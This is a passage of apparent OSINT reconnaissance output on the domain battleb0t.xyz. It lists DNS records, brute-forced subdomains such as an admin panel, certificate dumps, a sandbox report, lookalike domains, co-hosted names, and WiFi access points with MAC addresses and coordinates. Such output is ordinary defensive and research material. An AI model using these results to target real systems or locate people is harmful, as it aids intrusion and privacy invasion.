65:6c:70:ad:b8:e9:f0:44:9d:f5:1e:5f:f5:49:05:26:02:31:
00:af:38:a6:7e:99:e5:40:3e:28:0a:04:fc:e6:28:1e:0b:3b:
f4:a2:30:3a:2a:98:5c:14:93:92:27:5b:5b:a6:49:e2:da:ff:
a7:8f:34:6f:32:35:7e:32:3c:5a:8b:ec:81
|
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8003::153 | battleb0t.xyz |
| 2023-05-12 02:54:14 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://kekw.battleb0t.xyz/ | kekw.battleb0t.xyz |
| 2023-05-12 02:53:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://url1021.joinpreventor.com/ls/click?upn=bna4-2BmY1ITDZjl0PQKir67uPPI2f2DxWOATqx3-2Fj7OYylB8Hflza-2F4c-2BTJ51THm64bMitYJMpTuBxoVK0JwiPA-3D-3D6SWF_2XvlAmvoAz3TtepUWzZ-2Fg6Vtpb0zElD-2BU8dA0uWhdmvWpUzFQRCBLPcsU5at7iOPzNbZzyRCb5bSh-2BoMMyAUQdyJp9IV2xfegy0-2FMwvEi-2BwozwcLtcNHqHaMRs8zAm7v5oZ8wTMu7PUckSXiY1wEtrZaBDs-2BRBlmkbh9Bk665yd-2BGWxPZ3Mu0THZQM5-2FP11a-2BnjrPp01kRk3vpw-2FdkIVAY0zBticO8G8HkRCeTwIfKT9zQaL08iSXP09g4bM6aPaqGqiABBypIWkMX9voaonye-2FhTvmhVbMfIPyNM6dFuHHhzzLGrIVXSKSF6E-2BOGRIfxfAxK931o54RTlE-2B0snfd2QGewW05SsfFlJqS7DRs1HkS583lpCQaj-2FK4Iy1YDRwJnFPS5MjbvltaPnLRwriSR-2Fb5JG4SDVEinnEWy4pnM4-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b40_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b40_IESQMMUTEX_0_331"\n "IsoScope_b40_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b40_ConnHashTable<2880>_HashTable_Mutex"\n "IsoScope_b40_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b40_IE_EarlyTabStart_0x914_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2880"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.123.124:80"\n "52.11.45.250:443"\n "13.227.74.22:443"\n "142.250.188.10:443"\n "52.202.168.65:443"\n "185.199.109.153:443"\n "13.227.21.110:443"\n "13.227.74.87:443"\n "157.240.22.25:443"\n "136.143.191.67:443"\n "142.250.189.163:443"\n "13.227.74.48:443"\n "91.199.212.52:80"\n "136.143.191.144:443"\n "204.141.43.48:443"\n "136.143.190.97:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"url1021.joinpreventor.com"\n "crt.usertrust.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ajax.googleapis.com"\n "connect.facebook.net"\n "crt.usertrust.com"\n "css.zohocdn.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "js.zohocdn.com"\n "maciejsawicki.com"\n "preventor.com"\n "salesiq.zoho.com"\n "salesiq.zohopublic.com"\n "script.hotjar.com"\n "static.hotjar.com"\n "uploads-ssl.webflow.com"\n 
"url1021.joinpreventor.com"\n "vts.zohopublic.com"\n "www.bugherd.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"src="https://www.facebook.com/tr?id=2116198561850213&ev=PageView" (Indicator: "facebook.com"), "</style><meta name="twitter:card" content="summary" />" (Indicator: "twitter"), "<meta name="twitter:site" content="@Preventorft" />" (Indicator: "twitter"), "{state:0\ntransportUrl:b\ncontext:c\nparent:Wk()}\nP(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+Jh.ja+"&cx=c";Tr()&&(f+="&sign="+Jh.Xe);var g=Sh||ci?Sr(b,f):void 0;g||(g=Fo("https://","http://",Jh.ze+f));Qk().destination[a]={state:1\ncontext:c\nparent:Wk()};mc(g)}};function Ur(){if(Ok()){return!0}return!1};var Xr=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/)\nYr={cl:["ecl"]\ncustomPixels:["nonGooglePixels"]\necl:["cl"]\nehl:["hl"]\nhl:["ehl"]\nhtml:["customScripts"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\ncustomScripts:["html"\n"customPixels"\n"nonGooglePixels"\n"nonGoogleScripts"\n"nonGoogleIframes"]\nnonGooglePixels:[]\nnonGoogleScripts:["nonGooglePixels"]\nnonGoogleIframes:["nonGooglePixels"]}\nZr={cl:["ecl"]\ncustomPixels:["customScripts"\n"html"]\n" (Indicator: "youtube"), "var Jv=function(a,b,c){function d(){var g=a();f+=e?(Ua()-e)*g.playbackRate/1E3:0;e=Ua()}var e=0\nf=0;return{createEvent:function(g,h,m){var n=a()\np=n.Lg\nq=void 0!==m?Math.round(m):void 0!==h?Math.round(n.Lg*h):Math.round(n.Pi)\nr=void 0!==h?Math.round(100*h):0>=p?0:Math.round(q/p*100)\nt=G.hidden?!1:.5<=Pi(c);d();var u=void 0;void 0!==b&&(u=[b]);var 
v=lv(c,"gtm.video",u);v["gtm.videoProvider"]="youtube";v["gtm.videoStatus"]=g;v["gtm.videoUrl"]=n.url;v["gtm.videoTitle"]=n.title;v["gtm.videoDuration"]=" (Indicator: "youtube"), "b\n"vert.pix");break;case "PERCENT":qy(d.verticalThresholds,b,"vert.pct")}pv("sdl","init",!1)?pv("sdl","pending",!1)||I(function(){return ry()}):(nv("sdl","init",!0)\nnv("sdl","pending",!0)\nI(function(){ry();if(sy()){var e=ty();qc(z,"scroll",e);qc(z,"resize",e)}else nv("sdl","init",!1)}));return b}xy.N="internal.enableAutoEventOnScroll";var cc=ea(["data-gtm-yt-inspected-"])\nyy=["www.youtube.com"\n"www.youtube-nocookie.com"]\nzy\nAy=!1;" (Indicator: "youtube"), "m=!!a.get("fixMissingApi");if(!(d||e||f||g.length||h.length))return;var n={Gg:d\nEg:e\nFg:f\nlh:g\nmh:h\nWd:m\nib:b}\np=z.YT\nq=function(){Gy(n)};if(p)return p.ready&&p.ready(q)\nb;var r=z.onYouTubeIframeAPIReady;z.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=G.getElementsByTagName("script")\nu=t.length\nv=0;v<u;v++){var w=t[v].getAttribute("src");if(Jy(w,"iframe_api")||Jy(w,"player_api"))return b}for(var x=G.getElementsByTagName("iframe")\ny=x.length\nA=0;A<y;A++)if(!Ay&&Hy(x[A],n.Wd))return mc("https://www.youtube.com/iframe_api")\n" (Indicator: "youtube"), "Ay=!0\nb});return b}Ky.N="internal.enableAutoEventOnYouTubeActivity";var Ly;function My(a){var b=!1;return b}My.N="internal.evaluateMatchingRules";" (Indicator: "youtube"), "GET /5f774172772fc1fb1fa10c12/5f774173a2f6f80a3d80d3be_twitter.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "twitter"), "GET /5f774172772fc1fb1fa10c12/606cb3a9126777b98ff68805_icon-youtube.png HTTP/1.1Accept: image/png\n image/svg+xml\n image/*;q=0.8\n */*;q=0.5Referer: 
https://preventor.com/solutions/preventor-namesAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFB80.tmp" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d0e96629fb1faee847_mob_app%20store_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d096183ee5c61f2081_mob_google%20play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff60f8b3be007f3ef5780f3_Cover%20AML%20risk%20screening_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff5c5146d1b1ad22260e36b_seamless-integration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n 
"5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ac6d2755267bbee952_nav-anti-money-laundering_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c51ee3b2917a9fc9d3_nav-financial-services_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73c18f306a879a966_nav-law_1_.sv | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ELSA1 (Net ID: 00:02:2D:21:83:7A) | 50.1188, 8.6843 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | XFBSECA7HE6H (Net ID: 00:0D:67:66:08:15) | 32.8608, -79.9746 |
| 2023-05-12 03:10:05 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | ecash-pay.com | donation.ecash-pay.com |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | J-Snijders (Net ID: 00:0C:F6:25:03:E8) | 50.8897, 6.0563 |
| 2023-05-12 02:46:33 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:a2:98:ee:7c:0f:82:53:85:c9:ed:86:47:94:a7:aa:74:64
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:54:05 2023 GMT
Not After : Apr 27 17:54:04 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d2:cd:d6:7e:84:63:03:a9:a4:54:af:d4:a6:67:
cf:f7:3e:0c:ab:80:9d:a8:22:bf:ee:64:c0:1e:dd:
e1:9d:29:3b:aa:bb:b6:1a:dd:d0:c3:5d:15:61:c8:
eb:00:a8:62:02:a5:c4:0c:4d:3a:56:20:d3:19:1c:
24:d9:21:05:da:7b:34:cd:5b:3f:9f:3f:ff:56:cb:
60:a2:2a:6a:1f:63:a5:f7:6c:bc:e6:cd:4b:7c:cb:
c6:0b:ba:27:31:61:c2:7b:47:19:7b:f1:52:41:68:
44:d8:1a:a5:11:c2:d5:cd:2d:49:92:07:b0:5c:c3:
2d:0c:54:f4:e5:8e:0a:3e:0a:05:99:5f:e9:65:18:
80:c0:5e:b2:87:08:2d:60:b2:01:35:c9:41:a1:4e:
56:80:bc:0b:2d:89:62:c9:e1:19:f4:a9:de:a5:de:
27:dd:96:99:29:26:9e:36:03:45:4b:bf:4a:de:ef:
5f:47:82:05:6f:ed:a1:4f:34:05:75:05:59:d0:32:
a2:22:c4:9d:5a:65:cd:6b:45:d7:7f:45:90:2e:36:
4c:3d:0a:62:83:36:a6:3c:d9:df:00:c7:cb:10:68:
6e:0c:d8:9c:a6:a5:e6:32:7b:12:0d:1c:1f:90:20:
a5:a7:c9:da:be:0f:96:fe:30:6b:29:55:ac:4a:68:
7b:12:dd:43:df:cf:f5:49:87:8c:9b:38:92:62:52:
c6:f8:97:d4:43:d6:ed:cb:66:79:5b:c9:60:9e:db:
33:f0:59:fb:fd:35:62:83:55:b5:65:04:20:55:ee:
82:6d:de:85:c1:18:ed:8c:10:29:47:46:ee:2a:eb:
57:cd:b1:5e:14:a7:37:00:58:3a:35:9d:fe:99:73:
d6:cd:b6:67:17:f6:27:29:ea:32:96:67:c8:fa:43:
a3:c2:cc:ca:bb:cb:87:e5:76:db:8a:de:bc:58:c7:
6c:12:6a:a6:93:1b:0a:ce:07:98:f7:7c:0d:1d:5e:
2a:ac:2b:fb:17:f1:cb:e0:a5:02:67:2b:3d:67:81:
d8:de:3e:15:6a:f0:a0:0d:64:2d:0e:9b:55:1e:1b:
69:69:5a:ae:14:c6:1c:ce:8e:c5:fd:2c:25:74:92:
c1:35:de:00:ee:bc:fa:5d:88:f2:17:fe:70:37:3b:
3b:f5:14:3a:4b:f4:50:a9:91:31:99:48:3f:9e:c6:
ad:0b:a6:89:2d:77:db:fb:64:f8:31:9a:82:d1:cd:
f7:6a:51:a4:b7:d3:da:23:3d:ff:2a:45:de:3b:b5:
32:78:69:cd:54:60:d3:2a:39:e1:61:db:5a:d2:78:
94:77:f6:b5:99:c5:b9:3c:95:4b:75:db:f8:2b:d4:
ad:de:87
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:62:E5:21:FA:E8:50:FB:CE:5D:D2:7E:68:EA:9B:E0:B1:2E:4D:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:54:05.304 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2E:CD:16:75:5B:83:CE:34:DE:4E:0B:A5:
8F:CD:7C:C7:A7:A6:A9:11:C3:23:E1:0B:2A:31:9F:95:
73:C3:42:80:02:20:7B:D0:4F:D2:8B:72:CA:32:B2:4D:
CC:40:AA:8E:75:E9:77:4A:4F:D1:BA:D8:AE:0C:6B:30:
9E:04:63:28:D1:A8
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 27 18:54:05.294 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:F1:66:52:35:FF:56:8B:1D:79:47:47:
A7:1C:C3:D5:F7:A4:62:11:6E:72:13:33:6A:75:28:8C:
74:B2:4C:10:76:02:20:1B:97:A6:E2:6C:65:7B:C8:CD:
9F:BB:59:01:45:C5:3A:6B:BD:4B:C8:1B:69:3F:61:01:
38:DF:1A:9C:5B:33:60
Signature Algorithm: sha256WithRSAEncryption
ae:79:f7:6d:1b:71:32:86:32:db:2a:16:1c:43:90:9b:83:62:
0f:e8:c8:45:a2:74:39:9e:47:95:60:f9:a9:0f:5f:8f:26:9e:
6a:cb:48:fc:28:9f:be:95:de:3f:18:f2:a2:6b:df:e9:ed:0e:
0c:fe:77:c0:f9:43:13:cf:28:62:3e:eb:89:e6:eb:03:ba:b6:
65:d3:6f:26:2f:e2:cd:15:59:82:3c:0e:ae:d9:44:2e:69:94:
35:68:67:b8:2a:60:2d:04:59:19:48:8b:a7:19:32:be:3f:d4:
97:45:fa:e8:74:5a:8f:72:87:86:27:6f:fd:8c:2b:a4:50:d9:
22:2e:d0:5b:e8:25:5b:f1:50:e7:fa:72:45:0e:76:e9:66:71:
c9:e1:a7:8b:e8:5b:83:ac:a2:bc:89:be:14:a7:12:48:15:b7:
d6:1e:fe:ad:98:76:3e:16:2c:cf:38:d6:a3:13:69:b2:c3:42:
11:42:e6:c6:c6:df:61:d7:1c:e4:ca:7f:bc:9e:71:30:82:fe:
d4:6f:58:81:ab:0e:55:97:bb:c1:5d:e3:30:ef:17:60:9b:37:
2f:f7:be:34:13:0e:a6:78:95:12:19:fc:1f:5c:b8:e7:4a:08:
f6:f1:db:51:99:1c:e2:4d:5a:42:03:0e:eb:74:29:12:8b:42:
4a:ad:db:87
| battleb0t.xyz |
| 2023-05-12 03:16:17 | Similar Domain | Yes | Tool - DNSTwist | 1 | 0 | 1 | 0 | None | ayiu.xyz | ayhu.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_2.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | vulcan (Net ID: 00:02:8A:AD:D0:F3) | 39.0469, -77.4903 |
| 2023-05-12 03:25:06 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | panel.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | EAP6005G (Net ID: 00:02:6F:EB:3F:8B) | 50.8897, 6.0563 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | 165.232.113.85 |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-64@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": 
"2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": 
"2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": ["sitemap.posadisad.com", "the.pointlane.com", "shop.pointlane.com", "test.pointlane.com", "www.staging.pointlane.com", "www.blog.getsimnum.posadisad.com", "abs.posadisad.com", "getsimnum.posadisad.com", "in.pointlane.com", "posadisad.com", "magento.pointlane.com", "crm.sirket.im", "mail.pointlane.com", "www.mail.posadisad.com", "staging.pointlane.com", "sitemaps.posadisad.com", "pointlane.com", "www.sitemap.posadisad.com", "blog.getsimnum.posadisad.com", "www.demo.pointlane.com", "demo.pointlane.com", "what.pointlane.com", "www.store.pointlane.com", "www.old.pointlane.com", "www.mail.pointlane.com", "app.pointlane.com", "www.gitlab.pointlane.com", "app.posadisad.com", "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "blog.posadisad.com", "javadfra.softether.net", "at.pointlane.com", "mail.posadisad.com", "polygon.pointlane.com", "git.posadisad.com", "gitlab.posadisad.com", "old.pointlane.com", "wow.posadisad.com", "polygon.posadisad.com", "gitlab.pointlane.com", "apk.pointlane.com", "www.magento.pointlane.com", "www.polygon.pointlane.com", "dev.pointlane.com", "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com", "the.posadisad.com", "www.blog.posadisad.com", "store.pointlane.com", "www.dev.pointlane.com", "www.getsimnum.posadisad.com", "why.posadisad.com", 
